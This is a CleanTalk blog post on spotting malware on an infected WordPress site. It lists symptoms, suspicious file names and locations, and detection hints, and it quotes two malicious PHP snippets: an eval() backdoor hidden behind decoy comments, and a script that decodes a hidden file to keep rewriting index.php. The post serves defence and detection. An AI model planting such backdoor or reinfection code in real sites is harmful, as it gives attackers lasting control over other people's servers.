Hi guys,

I’d like to share some significant signals that tell about infection on a WordPress site. These data has been collected by our research team at CleanTalk. The team reviews up to 10k files weekly as well as we have over 1,600 signatures of malicious files.

How do I understand that my website is infected?

Before we look at malware signs, let’s dive into typical symptoms which show a WordPress site has been infected,

  1. Any HTTP redirects to third-party sites that automatically run on a website.
  2. Site responses much slower than it was.
  3. Hosting provider notifies about unusual utilization of servers resources like CPU or inbound/outbound traffic.
  4. Huge amount of outgoing email messages from server that hosts your web site.
  5. Broken design (HTML layout) of a website.

Signs of Malware files and Malicious code

Okay, here you are the signs of malware on a site,

1. Files down below are not located in the WordPress root (WP_ROOT),

wp-login.php
xmlrpc.php
admin-ajax.php
options.php
admin.php

2. File with name KGks.js.php is 100% malicious.

3. Files with name pattern and location WP_ROOT/wp-XXXXXXX.php (for example: WP_ROOT/wp-canvas.php, WP_ROOT/wp-controller.php), that includes code,

function getid3_lib($canonicalizedHeaders)
{ // Browser compatibility.
    eval($canonicalizedHeaders);
} // Remove the JSON file.

4. Any files without an extension and digits in the name. For example: 84639, 5718129 and etc.

5. Files with content like this,

<?php 
$ddscdws = "index.php"; 
$acdfadfasf = file_get_contents($ddscdws); $sdfdsdfh = "/home3/.../public_html/starmap/wp-content/plugins/astra-widgets/admin/bsf-analytics/assets/css/93917";
if (file_exists($sdfdsdfh)) { $iide = file_get_contents($sdfdsdfh); $iide = base64_decode(str_rot13($iide)); if(md5($acdfadfasf) != md5($iide)) { @chmod($ddscdws, 0644); 
@file_put_contents($ddscdws, $iide); 
@chmod($ddscdws, 0444); } }

6. Files with name from the list below most likely are malware,

radio.php,
ajax.php,
wso.php, 
cmd.php, 
shell.php, 
reverse_shell.php,
profile.php,
xmlrpc.php,
css.php,
category.php,
image.php,
admin.php,
impositive.php,
esp.php,
shellron.php.

7. Any *.php files that are located inside WP_ROOT/wp-content/uploads/.

8. Any suspicious code inside files,

WP_ROOT/index.php
WP_ROOT/wp-settings.php
WP_ROOT/wp-config.php

9. Files with suspicious names like 1gkj2saf.php, 862349.php, Ads8DU2.php and etc.

10. Hidden files with extensions .otc, .ott, .css are close to 100% are malicious. For example: .gk23sa.css, .1942t53.ott, .2634gkgre.otc and etc.

As you can see, attackers use server side executable files to run malware that is why you have to look after suspicious .php files on your WordPress site. As a bonus, here you are screenshots from our backend of a few good examples of malware files.

Please let me know your thoughts in the comment section down below.

Major signs of Malware on an infected WordPress site

Create your CleanTalk account



By signing up, you agree with license. Have an account? Log in.


Leave a Reply

Your email address will not be published. Required fields are marked *